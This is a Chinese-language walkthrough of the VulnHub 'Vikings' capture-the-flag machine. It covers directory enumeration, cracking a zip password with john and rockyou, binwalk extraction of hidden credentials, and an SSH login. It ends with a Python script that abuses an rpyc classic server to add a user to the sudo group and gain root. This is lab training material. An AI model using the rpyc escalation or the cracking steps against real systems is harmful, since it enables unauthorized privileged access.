IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> vulnhub之vikings -> 正文阅读

[网络协议]vulnhub之vikings

目录

地址:

一、主机发现

二、端口扫描

三、服务版本发现

四、信息收集

1.登录80页面

2.加载后

?3.扫目录

(1)gobuster

(2)查看war.txt

(3)查看/war-is-over

五、cyberchef

1.base64解密

2.Detect file type

六、zip解压

1.解压

2.john爆破

1.zip2john编码处理

2.john爆破

(1)cp字典

(2)解压字典

(3)爆破

3.king图片

七、隐写

1.steghide

?(1)尝试查看

2.binwalk

(1)分析

(2)提取

(3)查看

?八、ssh登录

九、信息收集

十、角谷猜想

1.生成第29个素数

2.角古猜想

十一、解码

1.replace替换

2.十进制对应的ascii编码对应的字符

3.string模块

?4.replace

?十二、登录ragnar

十三、查看shell启动相关文件

1.bashrc和profile都是Shell的启动设置文件

2.查看/usr/local/bin/rpyc_classic.py

3.构造payload

(1)在客户端构造一个连接

(2)teleport methd

(3)整合一下

(4)查看18812(默认端口)的状态

(4)提权

(5)拿到flag


地址:

https://download.vulnhub.com/vikings/Vikings.ova

一、主机发现

二、端口扫描

三、服务版本发现

-p扫描指定端口,-sC是用默认脚本扫描,-sV是对服务版本的发现。可以看到下面22端口ssh服务,unbuntu系统,80端口开启http服务。

四、信息收集

1.登录80页面

可以看到是这么一个页面,当我们点击site/文件时,响应非常的慢,一直在加载Google的某个站点所以很慢。

2.加载后

?出现了一个外国人和一段文字,讲了一段故事,出现了几个人名。

?3.扫目录

(1)gobuster

gobuster dir -r -u? http://192.168.43.243/site/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,php,jsp,txt?

(2)查看war.txt

出现了个目录

(3)查看/war-is-over

出现了一对密文,一看有+ / 大小写 数字,尝试base64解密

五、cyberchef

1.base64解密

解密出来仍然是一推密文。也不知道是啥类型的文件

2.Detect file type

在用这个detect file type模块可以识别出文件类型,是压缩文件类型。

六、zip解压

单词:extract(提取精炼)解压缩,

1.解压

压缩文件加密了,解压还要密码,收集也收集不到,只能去爆破了

2.john爆破

1.zip2john编码处理

编码处理转化为hash值

?zip2john miwen2.zip > hash

2.john爆破

(1)cp字典

cp /usr/share/wordlists/rockyou.txt.gz .

(2)解压字典

gunzip ./rockyou.txt.gz

(3)爆破

john hash? --wordlist=rockyou.txt

爆破出了密码

ragnarok123,名字是那个开头故事入侵者他爸ragnar

3.king图片

解压后出现了一张名为king的图片,但是呢,没有别的信息

七、隐写

百度百科:

隐写术是一门关于信息隐藏的技巧与科学,所谓信息隐藏指的是不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容。隐写术的英文叫做Steganography。

1.steghide

我们用到了这个参数,展示关于一个覆盖或隐藏文件,

?(1)尝试查看

steghide info king

结果仍然是要口令passphrase。暴力破解走不通。只能尝试慢慢去分析这个文件。

2.binwalk

(1)分析

binwalk是一个文件的分析工具,-B参数去扫描文件以常见的签名

binwalk -B king

这里分别有十进制,十六进制,和描述信息,在描述信息中我们可以看到,里面有zip文档资料。压缩大小,解压后的大小和解压后的名user

(2)提取

binwalk -e king

提取后我们可以发现有一个_king.extracted文件夹

(3)查看

得到了一些信息。

?八、ssh登录

通过这串信息经过一番尝试,通过用户名密码

floki??????? f@m0usboatbuilde7?

成功拿到了一个普通shell

九、信息收集

在有两个文件,一个boat 一个readme自述信息,先查看自述信息,发现他让我们来构造“boat”,在查看boat,我们看到两行代码,第一行第29个素数赋值给num,后交给一个函数处理,这个函数为角谷猜想。根据他的提示去构造代码,找到更多信息。

十、角谷猜想

1.生成第29个素数

n=0
for i in range(1000):
    if i<1:
        continue
    for j in range(2,i):
        if i % j == 0:
            break
    else:
        n+=1
        print(n,"::",i)

2.角古猜想

n = int(input('请输入一个数字(自然数):'))
print('角谷猜想的整个序列是:\n%d'%n)
while n!=1:
    if n % 2 == 0:
        k = n / 2
        n = k
        if n<256:
            print('%d'%n)
    elif n == 1:
        print('%d'%n)
        break
    else:
        g = 3 * n + 1
        n = g
        if n<256:
            print('%d'%n)

十一、解码

1.replace替换

2.十进制对应的ascii编码对应的字符

3.string模块

挑选出可打印出来的字符串

?4.replace

?十二、登录ragnar

当我们用获得的密码,通过ssh登录ragnar账户时,虽然成功登录,但是又让我们输入sudo的密码。输入之前获得的两个密码又不正确。猜测这里使用了某个开机就执行的命令。

十三、查看shell启动相关文件

1.bashrc和profile都是Shell的启动设置文件

当查看profile文件时,看到了sudo执行的python命令,可以猜测这就是登录shell就执行命令的原因。

2.查看/usr/local/bin/rpyc_classic.py

通过搜索我们可以知道rpyc这是一个远程方法调用的库,查看了文档后,尝试去构造payload

3.构造payload

(1)在客户端构造一个连接

import rpyc

conn = rpyc.classic.connect("localhost")

(2)teleport methd

def square(x):
    return x ** 2
fn = conn.teleport(square)
fn(2)

(3)整合一下

import rpyc
def aaa():
    import os
    os.system("sudo usermod -a -G sudo ragnar")
conn = rpyc.classic.connect("localhost")
fn = conn.teleport(aaa)
fn()

(4)查看18812(默认端口)的状态

服务端服务是开启的,python exp.py执行成功后,再次登录ragnar的用户我们会发现我们拥有了sudo的权限

(4)提权

登录ragnar用户后,我们来提权。

sudo -s

也可以用美化下界面

sudo -i

(5)拿到flag

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-25 11:44:25  更:2022-05-25 11:44:57 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年5日历 -2024/5/19 14:52:24-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码